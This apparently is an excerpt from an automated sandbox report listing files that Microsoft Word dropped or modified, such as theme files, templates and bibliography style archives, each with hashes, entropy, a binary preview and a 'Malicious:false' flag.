                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):274
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5303110391598502
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:Q+sxnxUXzRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnylymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                                                                                                                          MD5:8D1E1991838307E4C2197ECB5BA9FA79
                                                                                                                                                                                                                                                                                                                                                                          SHA1:4AD8BB98DC9C5060B58899B3E9DCBA6890BC9E93
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:4ABA3D10F65D050A19A3C2F57A024DBA342D1E05706A8A3F66B6B8E16A980DB9
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:DCDC9DB834303CC3EC8F1C94D950A104C504C588CE7631CE47E24268AABC18B1C23B6BEC3E2675E8A2A11C4D80EBF020324E0C7F985EA3A7BBC77C1101C23D01
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.s.h...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2924237
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.970803022812704
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                                                                                                                                                                                                                                                                                                                                                          MD5:5AF1581E9E055B6E323129E4B07B1A45
                                                                                                                                                                                                                                                                                                                                                                          SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):286
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5434534344080606
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:Q+sxnxUXIc5+RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny4KcymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                                                                                                                          MD5:C9812793A4E94320C49C7CA054EE6AA4
                                                                                                                                                                                                                                                                                                                                                                          SHA1:CC1F88C8F3868B3A9DE7E0E5F928DBD015234ABA
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:A535AE7DD5EDA6D31E1B5053E64D0D7600A7805C6C8F8AF1DB65451822848FFC
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D28AADEDE0473C5889F3B770E8D34B20570282B154CD9301932BF90BF6205CBBB96B51027DEC6788961BAF2776439ADBF9B56542C82D89280C0BEB600DF4B633
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.a.i.n._.E.v.e.n.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):274
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.4699940532942914
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUXGWWYlIWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxny2WzIgN2RGHmD0wbnKYZAH+Vwv
                                                                                                                                                                                                                                                                                                                                                                          MD5:55BA5B2974A072B131249FD9FD42EB91
                                                                                                                                                                                                                                                                                                                                                                          SHA1:6509F8AC0AA23F9B8F3986217190F10206A691EA
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:13FFAAFFC987BAAEF7833CD6A8994E504873290395DC2BD9B8E1D7E7E64199E7
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:3DFB0B21D09B63AF69698252D073D51144B4E6D56C87B092F5D97CE07CBCF9C966828259C8D95944A7732549C554AE1FF363CB936CA50C889C364AA97501B558
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.s.i.g.h.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Word 2007+
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):3465076
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.898517227646252
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                                                                                                                                                                                                                                                                                                                                                          MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                                                                                                                                                                                                                                                                                                                                                          SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........Y5B................[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.....g.../i..b../..}.-......U.....o.7B.......}@[..4o...E9n..h...Y....D.%......F....g..-!.|p.....7.pQVM.....B.g.-.7....:...d.2...7bA..Us.z.`.r..,.m."..n....s.O^.....fL.........7.....-...gn,J..iU..$.......i...(..dz.....3|
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):3611324
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.965784120725206
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                                                                                                                                                                                                                                                                                                                                                          MD5:FB88BFB743EEA98506536FC44B053BD0
                                                                                                                                                                                                                                                                                                                                                                          SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):288
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5359188337181853
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:Q+sxnxUXe46x8RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyO3UymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                                                                                                                          MD5:0FEA64606C519B78B7A52639FEA11492
                                                                                                                                                                                                                                                                                                                                                                          SHA1:FC9A6D5185088318032FD212F6BDCBD1CF2FFE76
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:60059C4DD87A74A2DC36748941CF5A421ED394368E0AA19ACA90D850FA6E4A13
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:E04102E435B8297BF33086C0AD291AD36B5B4A97A59767F9CAC181D17CFB21D3CAA3235C7CD59BB301C58169C51C05DDDF2D637214384B9CC0324DAB0BB1EF8D
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.p.o.r._.T.r.a.i.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 5864 bytes, 2 files, at 0x44 "architecture.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):22008
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.662386258803613
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:M7FUtfIdqSHQs7G8E0GftpBjED/C4RQrFLrHRN7TT8DlvQyUTL2mH:sWgdqR2G8Pi6D6YQZTTMvU+mH
                                                                                                                                                                                                                                                                                                                                                                          MD5:ABBF10CEE9480E41D81277E9538F98CB
                                                                                                                                                                                                                                                                                                                                                                          SHA1:F4EA53D180C95E78CC1DA88CD63F4C099BF0512C
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:557E0714D5536070131E7E7CDD18F0EF23FE6FB12381040812D022EC0FEE7957
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:9430DAACF3CA67A18813ECD842BE80155FD2DE0D55B7CD16560F4AAEFDA781C3E4B714D850D367259CAAB28A3BF841A5CB42140B19CFE04AC3C23C358CA87FFB
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF............D................................?..................................architecture.glox.................Content.inf..q5.^...[.....0y......../..CL.C5.Q..U5g.z....UUUMPC...C..P....T.....=..s..4c...-3H..E...2..2*..T...../.i.;$..............%...................'h.........#0.......[........c.h.....O...%.61...[.J..:.,^....W.]$..u...N.R.....H.......:%I.g5Kd.n6...W2.#.UL..h.8NN../.P...H.;@.N.F...v."h..K.....~.....8...{.+...&.#A.Q'..A.....[NJ.X.....|.|.G5...vp.h.p..1.....-...gECV.,o{6W.#L....4v..x..z..)[.......T.....BQ.pf..D.}...H....V..[._.'.......3..1....?m..ad..c(K.......N.N.6F%.m......9...4..]?...l6..).\p;w.s....@...I%H.....;\...R......f...3~:C...A..x....X...>...:~.+..r@..."......I..m.y..)F.l..9...6....m...=..Q.F.z..u......J].{WX...V.Z.b.A0B..!....~.;Z.....K.`c..,X.MFz....].Q.2.9..L."...]...6...JOU..6...~../......4A.|.......i.LKrY...2.R.o..X.\....0.%......>H.....8.z..^....5d|...4|...C......R28.E......a....e...J.S..Ng.]<&..mm
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 14864 bytes, 2 files, at 0x4c "mlaseventheditionofficeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):31008
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.806058951525675
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:ktH7oN/HbwiV+M+4Jc+5UrT3czi5uOHQA8Pi6DxUR/WTZIy:87sPEANXJc+eTMsuzP7DmN0ZIy
                                                                                                                                                                                                                                                                                                                                                                          MD5:E033CCBC7BA787A2F824CE0952E57D44
                                                                                                                                                                                                                                                                                                                                                                          SHA1:EEEA573BEA217878CD9E47D7EA94E56BDAFFE22A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:D250EB1F93B43EFB7654B831B4183C9CAEC2D12D4EFEE8607FEE70B9FAB20730
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:B807B024B32E7F975AED408B77563A6B47865EECE32E8BA993502D9874B56580ECC9D9A3FEFA057FDD36FB8D519B6E184DB0593A65CC0ACF5E4ACCBEDE0F9417
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF.....:......L............................:...?...................9......................mlaseventheditionofficeonline.xsl.L...............Content.inf.N.#.....[...>..9..3c.5...F.B.]Y.3..%d.8...v;....~Y.L.=..v..m.g...|K.B....$......s.......#CdE.p.p..@...j.Nl2'...L..N.G:-V:.d.....i..M........mK.w.....\W.<.`..b$.!..!3..rT.A..#.).;KZ...a.-..j&e`R.~7dIRS.I..f.ff....}.}....^[wo.uw..i.m7......v$.I..n....-.Z.M5...iH..Ea..., [..0.L...DH..." ..... .@...H.@..+...}.......*^..'.4*.tHa..f].gV..~.7V.....C..).(.U"..f.@l..j'..%\.u.UU.....9<13...5..=........./..Z..{..-.L].+Y.fL.<EJ.q..!.j....W..]E./.~Y>...GgQ..-....Q.C..5..T+...fO. .)..~.7..Y....+..U=.e..8w.m...._..S..v.d.* ......S3z.X)......u...t.......i.;.a...X.Ji....g.3.!.O.....T.f6..[U....O..Z.X.q.G....?.k]..?...8.u.;].8y.T.9D..!?R....:........3+.P.....7?m}..............1...y3.g.\c.ks^;?.f.U5...U.j....E.N.}.!.......).R1....~.....R.....3.J.f...l..E^:...&_..%..v...^..E...rC..O....M.#..<..H..bB.+.W..
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 15691 bytes, 2 files, at 0x4c "gb.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):31835
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.81952379746457
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:ltJDH8NmUekomvNufaqA8Pi6x5q3KQIGu:lvINukgzP7x5mRIGu
                                                                                                                                                                                                                                                                                                                                                                          MD5:92A819D434A8AAEA2C65F0CC2F33BB3A
                                                                                                                                                                                                                                                                                                                                                                          SHA1:85C3F1801EFFEA1EA10A8429B0875FC30893F2C8
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:5D13F9907AC381D19F0A7552FD6D9FC07C9BD42C0F9CE017FFF75587E1890375
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:01339E04130E08573DF7DBDFE25D82ED1D248B8D127BB90D536ECF4A26F5554E793E51E1A1800F61790738CC386121E443E942544246C60E47E25756F0C810A3
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF....K=......L...........................K=...?..................q<......................gb.xsl.................Content.inf.EF/.....[...A....3D.4..oVP!i/......t.6..l&9r0.8......c..q.^........$/..(./H ...^_Z0\4.42WU......P.F..9.._....'.D..<H@..E.b,K..9o..wo..v|..[.{7m.......|}aI..|g....IF2au?.1,..3.H.......ed....-.........m....$..8&0..w........2....s....z..d.Z.e.....@$r[..r..4...."E.Q@...Hh.B"b>...$.L.$.P.._..~.?./T..@..F..?.~G...MS..O%Z3*k..:..._...!GF..U...!..W..$..7...j......xy0..../.j..~4......8...YV....Fe.LU..J.B.k%BT5.X.q.w.a4....5..r...W.6.u...]i...t.....e.\.K............#t.c5.6....j...?#..{.m3.L9...E/....B[R.k(.'....S.'.}!j.tL..v....L....{<.m4......d_kD..D.....4`aC....rg..S..F.b..^........g;.`?,......\..T.\.H.8W.!V...1.T1.....|.Uh....T..yD'..R.......,.`h..~.....=......4..6E..x#XcVlc_S54 ..Q.4!V..P...{w..z.*..u.v....DC...W.(>4..a..h.t.F.Z...C.....&..%v...kt....n..2....+.@...EW.GE..%.:R`,}v.%.nx.P.#.f.......:.5(...]...n3{...v........Q..
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 18672 bytes, 2 files, at 0x4c "APASixthEditionOfficeOnline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):34816
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.840826397575377
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:i3R9VYnIYfPYmqX0CnF1SRHVnLG8Pi61YbEIFO:ih9VjYfPYlk+F1SJxP71YbEIFO
                                                                                                                                                                                                                                                                                                                                                                          MD5:62863124CDCDA135ECC0E722782CB888
                                                                                                                                                                                                                                                                                                                                                                          SHA1:2543B8A9D3B2304BB73D2ADBEC60DB040B732055
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:23CCFB7206A8F77A13080998EC6EF95B59B3C3E12B72B2D2AD4E53B0B26BB8C3
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:2734D1119DC14B7DFB417F217867EF8CE8E73D69C332587278C0896B91247A40C289426A1A53F1796CCB42190001273D35525FCEA8BA2932A69A581972A1EF00
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF.....H......L............................H...?...................G......................APASixthEditionOfficeOnline.xsl.H...............Content.inf..h;.....[...Q..\..3S.5..oVP!i/Z.Ls...]q$...xY..+W.qm..B..y/.5.s..x$../K./.x.$.....}.......\........LNf..Hd.&."Ip.L.Mr-@.D..kW~i...^.....F.....T.U....../..0..2.{.q.T.`'{.00.{.B...>.R..2....1.~_.f..s...........~....~[..v..w..v....$[K.r$#[6...d;[...#.9.-...G..Z..eAR.0")%JI?&....$..$.H..$(........f.> k....hP...p...!j.T......l7..../3..(2^V...#..T9...3.@[0...le:...........E....YP.\.....au1...\.S|..-.duN.Z..g.O......X8....1.....|,.f/..w.|Wk]zJz.g'./7h..+.....}............x....s.2Z\..W.{...O....W.{j.U..Q....uO=.p.M k.E.S{SUd.@....S.Syo8>......r......8..............Z?>.mUAg....?o....f.7..W.n...P..........d.S?...\..W`...c.ua..........#.Y...45...F(d.o\09^..[.}...BsT.SD..[l.8..uw.7l..S.9T.KR..o......V..]...M .....t.r...:P...M....4.F.....@..t.1t..S...k.2.|5...i.%H..<.J..*.0n.....lZ.....?.*?.~..O .)..
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 19375 bytes, 2 files, at 0x4c "turabian.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):35519
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.846686335981972
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:2LFougzHaUdBKUsM+Z56zBjA8Pi6bo+ld8IX:MFodzHaULR9P7bo+l6IX
                                                                                                                                                                                                                                                                                                                                                                          MD5:53EE9DA49D0B84357038ECF376838D2E
                                                                                                                                                                                                                                                                                                                                                                          SHA1:AB03F46783B2227F312187DD84DC0C517510DE20
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:9E46B8BA0BAD6E534AF33015C86396C33C5088D3AE5389217A5E90BA68252374
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:751300C76ECE4901801B1F9F51EACA7A758D5D4E6507E227558AAAAF8E547C3D59FA56153FEA96B6B2D7EB08C7AF2E4D5568ACE7E798D1A86CEDE363EFBECF7C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF.....K......L............................K...?...................J.......@..............turabian.xsl."...............Content.inf._.......[...T.....C4.5...E0B.]...+.-f....rc.[52.$...a..I....{z...`hx.r...!.. $...l..\....#3EF..r..c;<p...&n.\b..K..0Y..c+.2...i..B..wwY..77,...........}.q.C.......n..,.....prrx.QHy.B#..,.'....3....%1.``..hf...~...[.[n.v.s..y.vw....;..s.G293G&H....$E......m.&^..iy/.4.C...D...".(H&..&.I4._...!...... ........q.k1.d.....qc.3.c.....;.5.......y}...}&...+.WAN.,zVY.Q....V.Tz........g..H..c...E2jY...4g?.yf<....V.M.s.$..k.Id....+..?..._.\.s.k..9..I%;.yWQ..S..]..*.n<.7........=......"Q.*E.....MG..j.Yt..!U....Q.j...v.h-.~b..e&.......;...\.....:.....=..Xv1&q........6\...xw.%*.VdS..H...o...s.....+..%[../>.t..I....F.....".G|.....=....[..S..3..a.C.ZZ...tK.6N..b........)>........I..m..QE.M.nv.MVl.....vCG>,.suP.gqo.rr....J`m....J.b..},[F*....e.A.]..r....C4.?JJs6..l.].9...Q.B.~.......\d%.X ...8A....rH....&?#...^.....4.h.{>
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 12767 bytes, 2 files, at 0x4c "ieee2006officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):28911
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.7784119983764715
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:WnJY165YD0tPYoCKa3HueqRyzVscLk1Yj2GjcgbA8E0GftpBjE2kWTpjFLrHRN7N:X4rtPzCK6uRoljXBA8Pi62ZphL0HRA5p
                                                                                                                                                                                                                                                                                                                                                                          MD5:6D787B1E223DB6B91B69238062CCA872
                                                                                                                                                                                                                                                                                                                                                                          SHA1:A02F3D847D1F8973E854B89D4558413EA2E349F7
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:DA2F261C3C82E229A097A9302C8580F014BB6442825DB47C008DA097CFCE0EE4
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:9856D88D5C63CD6EBCF26E5D7521F194FA6B6E7BF55DD2E0238457A1B760EB8FB0D573A6E85E819BF8E5BE596537E99BC8C2DCE7EC6E2809A43490CACCD44169
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
